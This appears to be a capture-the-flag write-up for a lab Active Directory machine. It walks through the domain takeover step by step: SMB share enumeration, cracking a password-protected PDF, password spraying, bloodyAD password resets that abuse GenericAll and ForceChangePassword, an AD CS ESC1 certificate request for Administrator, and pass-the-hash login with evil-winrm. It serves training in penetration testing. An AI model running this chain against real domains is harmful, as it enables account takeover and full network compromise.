Welcome (Easy) — HackSmarter

Objective / Scope

You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client’s Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.

Starting Credentials

e.hills:Il0vemyj0b2025!

NMAP

53/tcp   open  domain           syn-ack ttl 126
88/tcp   open  kerberos-sec     syn-ack ttl 126
135/tcp  open  msrpc            syn-ack ttl 126
139/tcp  open  netbios-ssn      syn-ack ttl 126
389/tcp  open  ldap             syn-ack ttl 126
445/tcp  open  microsoft-ds     syn-ack ttl 126
464/tcp  open  kpasswd5         syn-ack ttl 126
593/tcp  open  http-rpc-epmap   syn-ack ttl 126
636/tcp  open  ldapssl          syn-ack ttl 126
3268/tcp open  globalcatLDAP    syn-ack ttl 126
3269/tcp open  globalcatLDAPssl syn-ack ttl 126
3389/tcp open  ms-wbt-server    syn-ack ttl 126
5357/tcp open  wsdapi           syn-ack ttl 126
5985/tcp open  wsman            syn-ack ttl 126

Bloodhound Loot

 nxc ldap 10.1.4.167 -u users -p 'Il0vemyj0b2025!' --bloodhound --collection all --dns-server 10.1.4.167

SMB Enumeration

nxc smb 10.1.4.167 -u 'e.hills' -p 'Il0vemyj0b2025!' --shares
SMB         10.1.4.167      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.4.167      445    DC01             [+] WELCOME.local\e.hills:Il0vemyj0b2025! 
SMB         10.1.4.167      445    DC01             [*] Enumerated shares
SMB         10.1.4.167      445    DC01             Share           Permissions     Remark
SMB         10.1.4.167      445    DC01             -----           -----------     ------
SMB         10.1.4.167      445    DC01             ADMIN$                          Remote Admin
SMB         10.1.4.167      445    DC01             C$                              Default share
SMB         10.1.4.167      445    DC01             Human Resources READ            
SMB         10.1.4.167      445    DC01             IPC$            READ            Remote IPC
SMB         10.1.4.167      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.1.4.167      445    DC01             SYSVOL          READ            Logon server share

Collecting Usernames

LISTING CONTENT Inside Shares

nxc smb 10.1.4.167 -u 'e.hills' -p 'Il0vemyj0b2025!' -M spider_plus

Share Human Resources has couple of PDFs let’s download all the PDFs.

smbclient //10.1.4.167/"HUMAN Resources"  -U 'e.hills'
Password for [WORKGROUP\e.hills]:
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> mget *
getting file \Welcome 2025 Holiday Schedule.pdf of size 84715 as Welcome 2025 Holiday Schedule.pdf (31.6 KiloBytes/sec) (average 31.6 KiloBytes/sec)
getting file \Welcome Benefits.pdf of size 81466 as Welcome Benefits.pdf (18.3 KiloBytes/sec) (average 23.3 KiloBytes/sec)
getting file \Welcome Handbook Excerpts.pdf of size 82644 as Welcome Handbook Excerpts.pdf (47.8 KiloBytes/sec) (average 28.1 KiloBytes/sec)
getting file \Welcome Performance Review Guide.pdf of size 79823 as Welcome Performance Review Guide.pdf (37.9 KiloBytes/sec) (average 30.0 KiloBytes/sec)
getting file \Welcome Start Guide.pdf of size 89511 as Welcome Start Guide.pdf (36.7 KiloBytes/sec) (average 31.2 KiloBytes/sec)
smb: \>

Opening Welcome\ Start\ Guide.pdf It ask for password this PDF is password protected we have to crack the password to open the PDF

Using john we cracked the PDF password now we can open the PDF and see What it contains.

Opening PDF it expose the default password WE****!@

Password Spraying

It worked for the user a.harris

shell as a.harris

Bloodhound Analysis

 nxc ldap 10.1.4.167 -u a.harris -p 'Removed' --bloodhound --collection all --dns-server 10.1.4.167

a.harris has GenericAll permissions over the user I.PARK. This allows a full takeover of the account.

bloodyAD --host 10.1.4.167 -d welcome.local -u a.harris -p 'removed!@'  set password 'I.PARK' 'Secsystemd!'

[+] Password changed successfully!

I.PARK has ForceChangePassword to user svc_ca, svc_web (Abusing ForceChangePassword)

bloodyAD --host 10.1.4.167 -u 'I.PARK' -p 'Secsystemd!' set password 'svc_ca' 'Systemd@123'

Domain Compromise (AD CS Exploitation)

Finding a Vulnerable Certificate Template

The template Welcome-Template is vulnerable to ESC1

certipy-ad find -u svc_ca -p 'Systemd@123' -target welcome.local -text -stdout -vulnerable

lookupsid.py 'welcome.local/svc_ca:Systemd@123'@10.1.4.167
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.1.4.167
[*] StringBinding ncacn_np:10.1.4.167[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-141921413-1529318470-1830575104

certipy-ad req -u '[email protected]' -p 'Systemd@123' -dc-ip '10.1.4.167' -target 'dc01.welcome.local' -ca 'WELCOME-CA' -template 'Welcome-Template' -upn '[email protected]' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'

 certipy-ad auth -pfx 'administrator.pfx' -dc-ip 10.1.4.167

evil-winrm -i 10.1.4.167 -u Administrator -H <NT_Hash>

PreviousSending Malicious RTF NextActive Directory Cheat Sheet

Last updated 1 month ago